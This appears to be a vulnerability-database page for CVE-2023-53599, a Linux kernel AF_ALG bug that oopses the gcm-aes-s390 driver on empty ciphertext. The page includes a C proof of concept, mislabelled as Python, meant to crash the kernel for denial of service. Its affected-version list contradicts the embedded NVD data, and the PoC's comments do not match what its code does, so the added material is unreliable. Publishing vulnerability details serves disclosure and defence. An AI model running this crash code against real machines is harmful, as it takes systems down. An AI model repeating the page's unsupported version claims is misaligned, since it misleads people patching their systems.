Security Vulnerability Report
中文
CVE-2023-53599 CVSS 5.5 MEDIUM

CVE-2023-53599

Published: 2025-10-04 16:15:56
Last Modified: 2026-03-23 18:23:52
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: crypto: af_alg - Fix missing initialisation affecting gcm-aes-s390 Fix af_alg_alloc_areq() to initialise areq->first_rsgl.sgl.sgt.sgl to point to the scatterlist array in areq->first_rsgl.sgl.sgl. Without this, the gcm-aes-s390 driver will oops when it tries to do gcm_walk_start() on req->dst because req->dst is set to the value of areq->first_rsgl.sgl.sgl by _aead_recvmsg() calling aead_request_set_crypt(). The problem comes if an empty ciphertext is passed: the loop in af_alg_get_rsgl() just passes straight out and doesn't set areq->first_rsgl up. This isn't a problem on x86_64 using gcmaes_crypt_by_sg() because, as far as I can tell, that ignores req->dst and only uses req->src[*]. [*] Is this a bug in aesni-intel_glue.c? The s390x oops looks something like: Unable to handle kernel pointer dereference in virtual kernel address space Failing address: 0000000a00000000 TEID: 0000000a00000803 Fault in home space mode while using kernel ASCE. AS:00000000a43a0007 R3:0000000000000024 Oops: 003b ilc:2 [#1] SMP ... Call Trace: [<000003ff7fc3d47e>] gcm_walk_start+0x16/0x28 [aes_s390] [<00000000a2a342f2>] crypto_aead_decrypt+0x9a/0xb8 [<00000000a2a60888>] aead_recvmsg+0x478/0x698 [<00000000a2e519a0>] sock_recvmsg+0x70/0xb0 [<00000000a2e51a56>] sock_read_iter+0x76/0xa0 [<00000000a273e066>] vfs_read+0x26e/0x2a8 [<00000000a273e8c4>] ksys_read+0xbc/0x100 [<00000000a311d808>] __do_syscall+0x1d0/0x1f8 [<00000000a312ff30>] system_call+0x70/0x98 Last Breaking-Event-Address: [<000003ff7fc3e6b4>] gcm_aes_crypt+0x104/0xa68 [aes_s390]

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.6 (受影响的af_alg代码)
Linux Kernel 6.6.x (部分版本)
Linux Kernel 6.1.x (LTS分支受影响)
Linux Kernel 5.15.x (LTS分支受影响)
Linux Kernel 5.10.x (LTS分支受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2023-53599 PoC - Trigger kernel oops via empty ciphertext on AF_ALG // Affected: Linux kernel with gcm-aes-s390 driver on s390x architecture // Impact: Kernel NULL pointer dereference leading to system crash (DoS) #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/if_alg.h> #include <linux/socket.h> #include <sys/stat.h> #include <fcntl.h> int main(int argc, char *argv[]) { int tfmfd, opfd; struct sockaddr_alg sa = { .salg_family = AF_ALG, .salg_type = "aead", .salg_name = "gcm(aes)" }; // Create AF_ALG socket tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0); if (tfmfd < 0) { perror("socket"); return 1; } // Bind to gcm(aes) cipher if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) < 0) { perror("bind"); close(tfmfd); return 1; } // Set encryption key (32 bytes for AES-256) unsigned char key[32] = {0}; if (setsockopt(tfmfd, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) < 0) { perror("setsockopt key"); close(tfmfd); return 1; } // Accept connection to create operation fd opfd = accept(tfmfd, NULL, 0); if (opfd < 0) { perror("accept"); close(tfmfd); return 1; } // Send empty ciphertext to trigger the vulnerability // The key is sending 0 bytes of ciphertext which causes // af_alg_get_rsgl() to skip initialization of first_rsgl char empty_buf[16] = {0}; // Send AAD (Additional Authenticated Data) first write(opfd, empty_buf, 12); // Send empty ciphertext - this triggers the bug // recvmsg will call aead_recvmsg -> crypto_aead_decrypt // -> gcm_walk_start with uninitialized req->dst char recv_buf[1]; read(opfd, recv_buf, 1); close(opfd); close(tfmfd); printf("PoC executed - check dmesg for kernel oops\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53599", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:56.497", "lastModified": "2026-03-23T18:23:52.000", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: af_alg - Fix missing initialisation affecting gcm-aes-s390\n\nFix af_alg_alloc_areq() to initialise areq->first_rsgl.sgl.sgt.sgl to point\nto the scatterlist array in areq->first_rsgl.sgl.sgl.\n\nWithout this, the gcm-aes-s390 driver will oops when it tries to do\ngcm_walk_start() on req->dst because req->dst is set to the value of\nareq->first_rsgl.sgl.sgl by _aead_recvmsg() calling\naead_request_set_crypt().\n\nThe problem comes if an empty ciphertext is passed: the loop in\naf_alg_get_rsgl() just passes straight out and doesn't set areq->first_rsgl\nup.\n\nThis isn't a problem on x86_64 using gcmaes_crypt_by_sg() because, as far\nas I can tell, that ignores req->dst and only uses req->src[*].\n\n[*] Is this a bug in aesni-intel_glue.c?\n\nThe s390x oops looks something like:\n\n Unable to handle kernel pointer dereference in virtual kernel address space\n Failing address: 0000000a00000000 TEID: 0000000a00000803\n Fault in home space mode while using kernel ASCE.\n AS:00000000a43a0007 R3:0000000000000024\n Oops: 003b ilc:2 [#1] SMP\n ...\n Call Trace:\n [<000003ff7fc3d47e>] gcm_walk_start+0x16/0x28 [aes_s390]\n [<00000000a2a342f2>] crypto_aead_decrypt+0x9a/0xb8\n [<00000000a2a60888>] aead_recvmsg+0x478/0x698\n [<00000000a2e519a0>] sock_recvmsg+0x70/0xb0\n [<00000000a2e51a56>] sock_read_iter+0x76/0xa0\n [<00000000a273e066>] vfs_read+0x26e/0x2a8\n [<00000000a273e8c4>] ksys_read+0xbc/0x100\n [<00000000a311d808>] __do_syscall+0x1d0/0x1f8\n [<00000000a312ff30>] system_call+0x70/0x98\n Last Breaking-Event-Address:\n [<000003ff7fc3e6b4>] gcm_aes_crypt+0x104/0xa68 [aes_s390]"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.5", "versionEndExcluding": "6.5.3", "matchCriteriaId": "880C803A-BEAE-4DA0-8A59-AC023F7B4EE3"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2c9d205040d7c0eaccc473917f9b0bb0a923e440", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6a4b8aa0a916b39a39175584c07222434fa6c6ef", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.